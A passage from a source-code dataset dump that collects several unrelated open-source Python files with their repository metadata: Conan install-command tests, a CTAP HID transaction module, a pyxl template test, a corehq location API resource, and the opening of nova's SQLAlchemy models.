| 0.639939
|
33134cd7c8754b1bc8b3552a9fb7d4905bb700db
| 21,736
|
py
|
Python
|
conans/test/integration/command/install/install_test.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | 1
|
2022-01-21T05:31:13.000Z
|
2022-01-21T05:31:13.000Z
|
conans/test/integration/command/install/install_test.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | null | null | null |
conans/test/integration/command/install/install_test.py
|
Wonders11/conan
|
28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8
|
[
"MIT"
] | null | null | null |
import os
import textwrap
from collections import OrderedDict
import pytest
from conans.model.ref import ConanFileReference
from conans.test.utils.tools import NO_SETTINGS_PACKAGE_ID
from conans.test.utils.tools import TestClient, TestServer, GenConanfile
from conans.util.files import mkdir, rmdir, save
@pytest.fixture()
def client():
c = TestClient(default_server_user=True)
save(c.cache.settings_path, "os: [Windows, Macos, Linux, FreeBSD]\nos_build: [Windows, Macos]")
save(c.cache.default_profile_path, "[settings]\nos=Windows")
return c
def test_not_found_package_dirty_cache(client):
# Conan takes a lock on the cache, and even if the package doesn't exist it
# leaves a trailing folder with the file locks. This test checks
# that the folder gets cleared
client.save({"conanfile.py": GenConanfile("Hello", "0.1")})
client.run("create . lasote/testing")
client.run("upload * --all --confirm")
client.run('remove "*" -f')
client.run(" install hello/0.1@lasote/testing", assert_error=True)
assert "Unable to find 'hello/0.1@lasote/testing'" in client.out
# This used to fail in Windows, because of the trailing lock
client.run("remove * -f")
client.run(" install Hello/0.1@lasote/testing")
def test_install_reference_txt(client):
# Test to check the "conan install <path> <reference>" command argument
client.save({"conanfile.txt": ""})
client.run("info .")
assert "conanfile.txt" in str(client.out).splitlines()
def test_install_reference_error(client):
# Test to check the "conan install <path> <reference>" command argument
client.run("install Pkg/0.1@myuser/testing user/testing", assert_error=True)
assert "ERROR: A full reference was provided as first argument" in client.out
def test_install_reference(client):
# Test to check the "conan install <path> <reference>" command argument
conanfile = textwrap.dedent("""
from conans import ConanFile
class Pkg(ConanFile):
def build(self):
self.output.info("REF: %s, %s, %s, %s"
% (self.name, self.version, self.user, self.channel))
""")
client.save({"conanfile.py": conanfile})
client.run(" install . Pkg/0.1@myuser/testing")
client.run(" info .")
assert "Pkg/0.1@myuser/testing" in client.out
client.run("build .")
assert "REF: Pkg, 0.1, myuser, testing" in client.out
# Trying with partial name
conanfile = conanfile + " name = 'Other'\n"
client.save({"conanfile.py": conanfile})
# passing the wrong package name raises
client.run(" install . Pkg/0.1@myuser/testing", assert_error=True)
assert "ERROR: Package recipe with name Pkg!=Other" in client.out
# Partial reference works
client.run(" install . 0.1@myuser/testing")
client.run("build .")
assert "REF: Other, 0.1, myuser, testing" in client.out
# And also full reference matching
client.run(" install . Other/0.1@myuser/testing")
client.run("build .")
assert "REF: Other, 0.1, myuser, testing" in client.out
# Trying with partial name and version
conanfile = conanfile + " version = '0.2'\n"
client.save({"conanfile.py": conanfile})
# passing the wrong package name raises
client.run(" install . Other/0.1@myuser/testing", assert_error=True)
assert "ERROR: Package recipe with version 0.1!=0.2" in client.out
# Partial reference works
client.run(" install . myuser/testing")
client.run("build .")
assert "REF: Other, 0.2, myuser, testing" in client.out
# And also full reference matching
client.run(" install . Other/0.2@myuser/testing")
client.run("build .")
assert "REF: Other, 0.2, myuser, testing" in client.out
def test_four_subfolder_install(client):
# https://github.com/conan-io/conan/issues/3950
client.save({"path/to/sub/folder/conanfile.txt": ""})
# If this doesn't fail, all good
client.run(" install path/to/sub/folder")
def test_install_system_requirements(client):
client.save({"conanfile.py": textwrap.dedent("""
from conans import ConanFile
class MyPkg(ConanFile):
def system_requirements(self):
self.output.info("Running system requirements!!")
""")})
client.run(" install .")
assert "Running system requirements!!" in client.out
client.run("export . Pkg/0.1@lasote/testing")
client.run(" install Pkg/0.1@lasote/testing --build")
assert "Running system requirements!!" in client.out
client.run("upload * --all --confirm")
client.run('remove "*" -f')
client.run(" install Pkg/0.1@lasote/testing")
assert "Running system requirements!!" in client.out
def test_install_transitive_pattern(client):
# Check that option values set with -o patterns propagate to transitive requirements
client.save({"conanfile.py": textwrap.dedent("""
from conans import ConanFile
class Pkg(ConanFile):
options = {"shared": [True, False, "header"]}
default_options = "shared=False"
def package_info(self):
self.output.info("PKG OPTION: %s" % self.options.shared)
""")})
client.run("create . Pkg/0.1@user/testing -o shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
client.save({"conanfile.py": textwrap.dedent("""
from conans import ConanFile
class Pkg(ConanFile):
requires = "Pkg/0.1@user/testing"
options = {"shared": [True, False, "header"]}
default_options = "shared=False"
def package_info(self):
self.output.info("PKG2 OPTION: %s" % self.options.shared)
""")})
client.run("create . Pkg2/0.1@user/testing -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: True" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: True" in client.out
# Priority of non-scoped options
client.run("create . Pkg2/0.1@user/testing -o shared=header -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o shared=header -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
# Prevalence of exact named option
client.run("create . Pkg2/0.1@user/testing -o *:shared=True -o Pkg2:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True -o Pkg2:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
# Prevalence of exact named option reverse
client.run("create . Pkg2/0.1@user/testing -o *:shared=True -o Pkg:shared=header "
"--build=missing")
assert "Pkg/0.1@user/testing: Calling build()" in client.out
assert "Pkg/0.1@user/testing: PKG OPTION: header" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: True" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True -o Pkg:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: header" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: True" in client.out
# Prevalence of alphabetical pattern
client.run("create . Pkg2/0.1@user/testing -o *:shared=True -o Pkg2*:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True -o Pkg2*:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
# Prevalence of alphabetical pattern, opposite order
client.run("create . Pkg2/0.1@user/testing -o Pkg2*:shared=header -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o Pkg2*:shared=header -o *:shared=True")
assert "Pkg/0.1@user/testing: PKG OPTION: True" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
# Prevalence and override of alphabetical pattern
client.run("create . Pkg2/0.1@user/testing -o *:shared=True -o Pkg*:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: header" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
client.run(" install Pkg2/0.1@user/testing -o *:shared=True -o Pkg*:shared=header")
assert "Pkg/0.1@user/testing: PKG OPTION: header" in client.out
assert "Pkg2/0.1@user/testing: PKG2 OPTION: header" in client.out
def test_install_package_folder(client):
# Make sure a simple conan install doesn't fire package_info(), which would break here
client.save({"conanfile.py": textwrap.dedent("""\
from conans import ConanFile
import os
class Pkg(ConanFile):
def package_info(self):
self.dummy_doesnt_exist_not_break
self.output.info("Hello")
self.env_info.PATH = os.path.join(self.package_folder, "bin")
""")})
client.run(" install .")
assert "Hello" not in client.out
assert "conanfile.py: Generated conaninfo.txt" in client.out
def test_install_cwd(client):
client.save({"conanfile.py": GenConanfile("Hello", "0.1").with_setting("os")})
client.run("export . lasote/stable")
client.save({"conanfile.txt": "[requires]\nHello/0.1@lasote/stable"}, clean_first=True)
client.run("install . --build=missing -s os_build=Windows --install-folder=win_dir")
assert "Hello/0.1@lasote/stable from local cache" in client.out
client.run("install . --build=missing -s os=Macos -s os_build=Macos "
"--install-folder=os_dir")
conaninfo = client.load("win_dir/conaninfo.txt")
assert "os=Windows" in conaninfo
assert "os=Macos" not in conaninfo
conaninfo = client.load("os_dir/conaninfo.txt")
assert "os=Windows" not in conaninfo
assert "os=Macos" in conaninfo
def test_install_reference_not_conanbuildinfo(client):
client.save({"conanfile.py": GenConanfile("Hello", "0.1").with_setting("os")})
client.run("create . conan/stable")
client.save({}, clean_first=True)
client.run("install Hello/0.1@conan/stable")
assert not os.path.exists(os.path.join(client.current_folder, "conanbuildinfo.txt"))
def test_install_with_profile(client):
# Test for https://github.com/conan-io/conan/pull/2043
conanfile = textwrap.dedent("""
from conans import ConanFile
class TestConan(ConanFile):
settings = "os"
def requirements(self):
self.output.info("PKGOS=%s" % self.settings.os)
""")
client.save({"conanfile.py": conanfile})
client.run("profile new myprofile")
client.run("profile update settings.os=Linux myprofile")
client.run("install . -pr=myprofile --build")
assert "PKGOS=Linux" in client.out
mkdir(os.path.join(client.current_folder, "myprofile"))
client.run("install . -pr=myprofile")
client.run("profile new myotherprofile")
client.run("profile update settings.os=FreeBSD myotherprofile")
client.run("install . -pr=myotherprofile")
assert "PKGOS=FreeBSD" in client.out
client.save({"myotherprofile": "Some garbage without sense [garbage]"})
client.run("install . -pr=myotherprofile")
assert "PKGOS=FreeBSD" in client.out
client.run("install . -pr=./myotherprofile", assert_error=True)
assert "Error while parsing line 0" in client.out
def test_install_with_path_errors(client):
# Install without path param not allowed
client.run("install", assert_error=True)
assert "ERROR: Exiting with code: 2" in client.out
# Path with wrong conanfile.txt path
client.run("install not_real_dir/conanfile.txt --install-folder subdir", assert_error=True)
assert "Conanfile not found" in client.out
# Path with wrong conanfile.py path
client.run("install not_real_dir/conanfile.py --install-folder build", assert_error=True)
assert "Conanfile not found" in client.out
def test_install_broken_reference(client):
client.save({"conanfile.py": GenConanfile()})
client.run("export . Hello/0.1@lasote/stable")
client.run("remote add_ref Hello/0.1@lasote/stable default")
ref = ConanFileReference.loads("Hello/0.1@lasote/stable")
# Because the folder is removed, the metadata is removed and the
# origin remote is lost
rmdir(os.path.join(client.cache.package_layout(ref).base_folder()))
client.run("install Hello/0.1@lasote/stable", assert_error=True)
assert "ERROR: Unable to find 'Hello/0.1@lasote/stable' in remotes" in client.out
# If it was associated, it has to be disassociated
client.run("remote remove_ref Hello/0.1@lasote/stable")
client.run("install Hello/0.1@lasote/stable", assert_error=True)
assert "ERROR: Unable to find 'Hello/0.1@lasote/stable' in remotes" in client.out
def test_install_argument_order(client):
# https://github.com/conan-io/conan/issues/2520
conanfile_boost = textwrap.dedent("""
from conans import ConanFile
class BoostConan(ConanFile):
name = "boost"
version = "0.1"
options = {"shared": [True, False]}
default_options = "shared=True"
""")
conanfile = GenConanfile().with_require("boost/0.1@conan/stable")
client.save({"conanfile.py": conanfile,
"conanfile_boost.py": conanfile_boost})
client.run("create conanfile_boost.py conan/stable")
client.run("install . -o boost:shared=True --build=missing")
output_0 = "%s" % client.out
client.run("install . -o boost:shared=True --build missing")
output_1 = "%s" % client.out
client.run("install -o boost:shared=True . --build missing")
output_2 = "%s" % client.out
client.run("install -o boost:shared=True --build missing .")
output_3 = "%s" % client.out
assert "ERROR" not in output_3
assert output_0 == output_1
assert output_1 == output_2
assert output_2 == output_3
client.run("install -o boost:shared=True --build boost . --build missing")
output_4 = "%s" % client.out
client.run("install -o boost:shared=True --build missing --build boost .")
output_5 = "%s" % client.out
assert output_4 == output_5
def test_install_anonymous(client):
# https://github.com/conan-io/conan/issues/4871
client.save({"conanfile.py": GenConanfile("Pkg", "0.1")})
client.run("create . lasote/testing")
client.run("upload * --confirm --all")
client2 = TestClient(servers=client.servers, users={})
client2.run("install Pkg/0.1@lasote/testing")
assert "Pkg/0.1@lasote/testing: Package installed" in client2.out
def test_install_without_ref(client):
client.save({"conanfile.py": GenConanfile("lib", "1.0")})
client.run('create .')
assert "lib/1.0: Package '{}' created".format(NO_SETTINGS_PACKAGE_ID) in client.out
client.run('upload lib/1.0 -c --all')
assert "Uploaded conan recipe 'lib/1.0' to 'default'" in client.out
client.run('remove "*" -f')
# This fails, Conan thinks this is a path
client.run('install lib/1.0', assert_error=True)
fake_path = os.path.join(client.current_folder, "lib", "1.0")
assert "Conanfile not found at {}".format(fake_path) in client.out
# Try this syntax to upload too
client.run('install lib/1.0@')
client.run('upload lib/1.0@ -c --all')
def test_install_disabled_remote(client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . Pkg/0.1@lasote/testing")
client.run("upload * --confirm --all -r default")
client.run("remote disable default")
client.run("install Pkg/0.1@lasote/testing -r default")
assert "Pkg/0.1@lasote/testing: Already installed!" in client.out
client.run("remote enable default")
client.run("install Pkg/0.1@lasote/testing -r default")
client.run("remote disable default")
client.run("install Pkg/0.1@lasote/testing --update", assert_error=True)
assert "ERROR: Remote 'default' is disabled" in client.out
def test_install_skip_disabled_remote():
client = TestClient(servers=OrderedDict({"default": TestServer(),
"server2": TestServer(),
"server3": TestServer()}),
users={"default": [("lasote", "mypass")],
"server3": [("lasote", "mypass")]})
client.save({"conanfile.py": GenConanfile()})
client.run("create . Pkg/0.1@lasote/testing")
client.run("upload * --confirm --all -r default")
client.run("upload * --confirm --all -r server3")
client.run("remove * -f")
client.run("remote disable default")
client.run("install Pkg/0.1@lasote/testing", assert_error=False)
assert "Trying with 'default'..." not in client.out
def test_install_without_update_fail(client):
# https://github.com/conan-io/conan/issues/9183
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("upload * --confirm --all -r default")
client.save({"conanfile.py": GenConanfile().with_requires("zlib/1.0")})
client.run("remote disable default")
client.run("install .")
assert "zlib/1.0: Already installed" in client.out
def test_install_version_range_reference(client):
# https://github.com/conan-io/conan/issues/5905
client.save({"conanfile.py": GenConanfile()})
client.run("create . pkg/0.1@user/channel")
client.run("install pkg/[*]@user/channel")
assert "pkg/0.1@user/channel from local cache - Cache" in client.out
client.run("install pkg/[0.*]@user/channel")
assert "pkg/0.1@user/channel from local cache - Cache" in client.out
def test_install_error_never(client):
client.save({"conanfile.py": GenConanfile("Hello0", "0.1")})
client.run("create .")
client.run("install . --build never --build missing", assert_error=True)
assert "ERROR: --build=never not compatible with other options" in client.out
client.run("install conanfile.py --build never --build Hello", assert_error=True)
assert "ERROR: --build=never not compatible with other options" in client.out
client.run("install ./conanfile.py --build never --build outdated", assert_error=True)
assert "ERROR: --build=never not compatible with other options" in client.out
class TestCliOverride:
def test_install_cli_override(self, client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("create . zlib/2.0@")
client.save({"conanfile.py": GenConanfile().with_requires("zlib/1.0")})
client.run("install . --require-override=zlib/2.0")
assert "zlib/2.0: Already installed" in client.out
def test_install_cli_override_in_conanfile_txt(self, client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("create . zlib/2.0@")
client.save({"conanfile.txt": textwrap.dedent("""\
[requires]
zlib/1.0
""")}, clean_first=True)
client.run("install . --require-override=zlib/2.0")
assert "zlib/2.0: Already installed" in client.out
def test_install_ref_cli_override(self, client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("create . zlib/1.1@")
client.save({"conanfile.py": GenConanfile().with_requires("zlib/1.0")})
client.run("create . pkg/1.0@")
client.run("install pkg/1.0@ --require-override=zlib/1.1")
assert "zlib/1.1: Already installed" in client.out
def test_create_cli_override(self, client):
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@")
client.run("create . zlib/2.0@")
client.save({"conanfile.py": GenConanfile().with_requires("zlib/1.0"),
"test_package/conanfile.py": GenConanfile().with_test("pass")})
client.run("create . pkg/0.1@ --require-override=zlib/2.0")
assert "zlib/2.0: Already installed" in client.out
def test_install_bintray_warning():
server = TestServer(complete_urls=True)
from conans.client.graph import proxy
proxy.DEPRECATED_CONAN_CENTER_BINTRAY_URL = server.fake_url # Mocking!
client = TestClient(servers={"conan-center": server},
users={"conan-center": [("lasote", "mypass")]})
client.save({"conanfile.py": GenConanfile()})
client.run("create . zlib/1.0@lasote/testing")
client.run("upload zlib/1.0@lasote/testing --all -r conan-center")
client.run("remove * -f")
client.run("install zlib/1.0@lasote/testing -r conan-center")
assert "WARN: Remote https://conan.bintray.com is deprecated and will be shut down " \
"soon" in client.out
client.run("install zlib/1.0@lasote/testing -r conan-center -s build_type=Debug")
assert "WARN: Remote https://conan.bintray.com is deprecated and will be shut down " \
"soon" not in client.out
| 45.377871
| 99
| 0.669534
|
4478053d9fa18eac052c9f007347a297829618bc
| 7,668
|
py
|
Python
|
src/ctap/transaction.py
|
Castellate/VirtualWebAuthn
|
df0f1ee30664b1ee5116fb4277d0bc663be1b914
|
[
"BSD-2-Clause"
] | 3
|
2021-08-18T09:54:49.000Z
|
2022-03-22T20:55:43.000Z
|
src/ctap/transaction.py
|
Castellate/VirtualWebAuthn
|
df0f1ee30664b1ee5116fb4277d0bc663be1b914
|
[
"BSD-2-Clause"
] | 1
|
2021-09-03T10:13:01.000Z
|
2021-09-03T10:13:01.000Z
|
src/ctap/transaction.py
|
Castellate/VirtualWebAuthn
|
df0f1ee30664b1ee5116fb4277d0bc663be1b914
|
[
"BSD-2-Clause"
] | 2
|
2021-12-22T19:10:21.000Z
|
2022-03-14T11:30:31.000Z
|
"""Contains classes and Enums for managing transactions
"""
"""
© Copyright 2020-2021 University of Surrey
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
from enum import Enum, unique
import logging
import json
import ctap.constants
from ctap.exceptions import TransactionStateException, TransactionChannelIDException
from ctap.messages import (CTAPHIDCMD, CTAPHIDCancelResponse, CTAPHIDErrorResponse,
CTAPHIDKeepAliveResponse)
log = logging.getLogger('debug')
ctaplog = logging.getLogger('debug.ctap')
@unique
class TRANSACTION_STATE(Enum):
"""Enum that holds the transaction state
"""
EMPTY = 0
REQUEST_RECV = 1
RESPONSE_SET = 2
KEEP_ALIVE=7
CANCEL = 8
ERROR = 9
class CTAPHIDTransaction:
"""Transaction class the enforces and hold the request-response
messages associated with a CTAP transaction
"""
def __init__(self, channel_id:bytes):
"""Instantiates a new instance associated with the specified channel
Args:
channel_id (bytes): channel id bytes
"""
self.request = None
self.response = None
self.state = TRANSACTION_STATE.EMPTY
self.channel_id = channel_id
def get_cid(self)->bytes:
"""Gets the channel id associated with this transaction
Returns:
bytes: channel id bytes
"""
return self.channel_id
def is_error_transaction(self)->bool:
"""Checks whether this is a special error transaction
that may not have a corresponding request
Returns:
bool: True if it is an error transaction, False if not
"""
return self.state == TRANSACTION_STATE.ERROR
def is_keep_alive_transaction(self)->bool:
"""Checks whether this is a special keep-alive transaction
that may not have a corresponding request
Returns:
bool: True if it is a keep-alive transaction, False if not
"""
return self.state == TRANSACTION_STATE.KEEP_ALIVE
def __str__(self):
out = {}
if self.request is None:
out["request"]=None
else:
out["request"]=json.loads(self.request.__str__())
if self.response is None:
out["response"]=None
else:
out["response"]= json.loads(self.response.__str__())
out["state"]=self.state.name
out["channel_id"] = self.channel_id.hex()
return json.dumps(out)
def set_request(self, request: CTAPHIDCMD):
"""Sets the request part of this transaction
Args:
request (CTAPHIDCMD): request to be set
Raises:
TransactionStateException: thrown if transaction is in an
invalid state to receive a request
TransactionChannelIDException: thrown if the request does not
match the transaction channel id
"""
if not self.verify_state(TRANSACTION_STATE.REQUEST_RECV):
ctaplog.error("Invalid state in transaction to set request, current state: %s",
self.state )
raise TransactionStateException("Invalid state, cannot set request")
if (request.get_cid() != ctap.constants.BROADCAST_ID and
request.get_cid() != self.channel_id):
raise TransactionChannelIDException("Invalid channel ID for transaction")
self.state = TRANSACTION_STATE.REQUEST_RECV
self.request = request
ctaplog.debug("Set request, changed state: %s", self.state )
def set_response(self, response: CTAPHIDCMD):
"""Sets the response part of the transaction
Args:
response (CTAPHIDCMD): response to set
Raises:
TransactionStateException: thrown if transaction is in an
invalid state to receive a response
TransactionChannelIDException: thrown if the response does not
match the transaction channel id
"""
if not self.verify_state(TRANSACTION_STATE.RESPONSE_SET):
ctaplog.error("Invalid state in transaction to set response, current state: %s",
self.state )
raise TransactionStateException("Invalid state, cannot set response")
if (response.get_cid() != ctap.constants.BROADCAST_ID and
response.get_cid() != self.channel_id):
raise TransactionChannelIDException("Invalid channel ID for transaction")
self.state = TRANSACTION_STATE.RESPONSE_SET
self.response = response
ctaplog.debug("Set response, changed state: %s", self.state )
def reset(self):
"""Resets the transaction clearling request, response and state
"""
self.request = None
self.response = None
self.state = TRANSACTION_STATE.EMPTY
def cancel(self, response: CTAPHIDCancelResponse):
"""Cancels the request by setting the state to cancel and
setting the response to cancel
Args:
response (CTAPHIDCancelResponse): cancel response to send
"""
self.reset()
self.state = TRANSACTION_STATE.CANCEL
self.response = response
def error(self, response: CTAPHIDErrorResponse):
"""Sets the transaction to an error state and sets an error
response to be sent
Args:
response (CTAPHIDErrorResponse): error response to send
"""
self.state = TRANSACTION_STATE.ERROR
self.response = response
def keep_alive(self,response: CTAPHIDKeepAliveResponse):
"""Sets the transaction to a keep-alive state and sets the
keep-alive response to be sent.
Args:
response (CTAPHIDKeepAliveResponse): keep-alive response to send
"""
self.state = TRANSACTION_STATE.KEEP_ALIVE
self.response = response
def verify_state(self, target_state: TRANSACTION_STATE):
"""Verifies the state machine of the CTAP HID Transaction.
If a request has been received it must be followed by a response being
sent before the next request can be received.
Parameters
----------
target_state : TRANSACTION_STATE
Enum of target transaction state
Returns
-------
bool
True if valid, False if not
"""
return (target_state.value == (self.state.value + 1) and
target_state.value <= TRANSACTION_STATE.RESPONSE_SET.value)
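# A minimal usage sketch (assumed, not taken from the project's own docs): since
# verify_state() only lets the state advance by one step up to RESPONSE_SET, the
# normal lifecycle is EMPTY -> REQUEST_RECV -> RESPONSE_SET, then reset().
# "incoming_msg" and "outgoing_msg" below stand for CTAPHIDCMD instances whose
# channel id matches the transaction's; they are placeholders only.
#
# transaction = CTAPHIDTransaction(channel_id=b"\x01\x02\x03\x04")
# transaction.set_request(incoming_msg)     # EMPTY -> REQUEST_RECV
# transaction.set_response(outgoing_msg)    # REQUEST_RECV -> RESPONSE_SET
# transaction.reset()                       # back to EMPTY for the next exchange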
| 36.688995
| 92
| 0.670188
|
f7f7778c7ed11670ebf154abc1c2b4ab8604eef1
| 140
|
py
|
Python
|
tests/test_curlies_in_attrs_2.py
|
gvanrossum/pyxl3
|
e6588c12caee49c43faf6aa260f04d7e971f6aa8
|
[
"Apache-2.0"
] | 150
|
2016-01-26T13:25:58.000Z
|
2022-03-11T14:31:45.000Z
|
tests/test_curlies_in_attrs_2.py
|
gvanrossum/pyxl3
|
e6588c12caee49c43faf6aa260f04d7e971f6aa8
|
[
"Apache-2.0"
] | 7
|
2016-02-07T20:08:55.000Z
|
2019-07-09T03:35:49.000Z
|
tests/test_curlies_in_attrs_2.py
|
gvanrossum/pyxl3
|
e6588c12caee49c43faf6aa260f04d7e971f6aa8
|
[
"Apache-2.0"
] | 19
|
2016-01-27T15:48:48.000Z
|
2020-11-06T07:31:12.000Z
|
# coding: pyxl
from pyxl import html
def test():
assert str(<frag><img src="barbaz{'foo'}" /></frag>) == """<img src="barbazfoo" />"""
| 23.333333
| 89
| 0.585714
|
25cd5c9842ae4d2f8f97a27c37a694f38e414141
| 1,253
|
py
|
Python
|
corehq/apps/locations/resources/v0_1.py
|
SEL-Columbia/commcare-hq
|
992ee34a679c37f063f86200e6df5a197d5e3ff6
|
[
"BSD-3-Clause"
] | 1
|
2015-02-10T23:26:39.000Z
|
2015-02-10T23:26:39.000Z
|
corehq/apps/locations/resources/v0_1.py
|
SEL-Columbia/commcare-hq
|
992ee34a679c37f063f86200e6df5a197d5e3ff6
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/locations/resources/v0_1.py
|
SEL-Columbia/commcare-hq
|
992ee34a679c37f063f86200e6df5a197d5e3ff6
|
[
"BSD-3-Clause"
] | null | null | null |
from tastypie import fields
from corehq.apps.locations.models import Location, root_locations
from corehq.apps.api.resources.v0_1 import CustomResourceMeta, LoginAndDomainAuthentication
from corehq.apps.api.util import get_object_or_not_exist
from corehq.apps.api.resources import JsonResource
class LocationResource(JsonResource):
type = "location"
uuid = fields.CharField(attribute='_id', readonly=True, unique=True)
location_type = fields.CharField(attribute='location_type', readonly=True)
name = fields.CharField(attribute='name', readonly=True, unique=True)
def obj_get(self, bundle, **kwargs):
domain = kwargs['domain']
location_id = kwargs['pk']
return get_object_or_not_exist(Location, location_id, domain)
def obj_get_list(self, bundle, **kwargs):
domain = kwargs['domain']
parent_id = bundle.request.GET.get("parent_id", None)
if parent_id:
parent = get_object_or_not_exist(Location, parent_id, domain)
return parent.children
return root_locations(domain)
class Meta(CustomResourceMeta):
authentication = LoginAndDomainAuthentication()
object_class = Location
resource_name = 'location'
limit = 0
| 39.15625
| 91
| 0.72067
|
e50e631b9edefe95acc719ff360ba8bed4630a17
| 55,155
|
py
|
Python
|
nova/db/sqlalchemy/models.py
|
nelsnelson/nova
|
826fe1cc6af2df291d5aaafdc5d498d626475d19
|
[
"Apache-2.0"
] | null | null | null |
nova/db/sqlalchemy/models.py
|
nelsnelson/nova
|
826fe1cc6af2df291d5aaafdc5d498d626475d19
|
[
"Apache-2.0"
] | null | null | null |
nova/db/sqlalchemy/models.py
|
nelsnelson/nova
|
826fe1cc6af2df291d5aaafdc5d498d626475d19
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for nova data.
"""
from oslo_config import cfg
from oslo_db.sqlalchemy import models
from oslo_utils import timeutils
from sqlalchemy import (Column, Index, Integer, BigInteger, Enum, String,
schema, Unicode)
from sqlalchemy.dialects.mysql import MEDIUMTEXT
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import orm
from sqlalchemy import ForeignKey, DateTime, Boolean, Text, Float
from nova.db.sqlalchemy import types
CONF = cfg.CONF
BASE = declarative_base()
def MediumText():
return Text().with_variant(MEDIUMTEXT(), 'mysql')
class NovaBase(models.TimestampMixin,
models.ModelBase):
metadata = None
def __copy__(self):
"""Implement a safe copy.copy().
SQLAlchemy-mapped objects travel with an object
called an InstanceState, which is pegged to that object
specifically and tracks everything about that object. It's
critical within all attribute operations, including gets
and deferred loading. This object definitely cannot be
shared among two instances, and must be handled.
The copy routine here makes use of session.merge() which
already essentially implements a "copy" style of operation,
which produces a new instance with a new InstanceState and copies
all the data along mapped attributes without using any SQL.
The mode we are using here has the caveat that the given object
must be "clean", e.g. that it has no database-loaded state
that has been updated and not flushed. This is a good thing,
as creating a copy of an object including non-flushed, pending
database state is probably not a good idea; neither represents
what the actual row looks like, and only one should be flushed.
"""
session = orm.Session()
copy = session.merge(self, load=False)
session.expunge(copy)
return copy
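# Illustrative sketch only (not from the nova source): because __copy__ merges
# into a throwaway session with load=False and then expunges the result,
# copy.copy() on a clean mapped object yields a detached duplicate with its own
# InstanceState. "clean_instance" below is a hypothetical, unmodified, flushed
# model instance.
#
#   import copy
#   duplicate = copy.copy(clean_instance)
#   assert duplicate is not clean_instance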
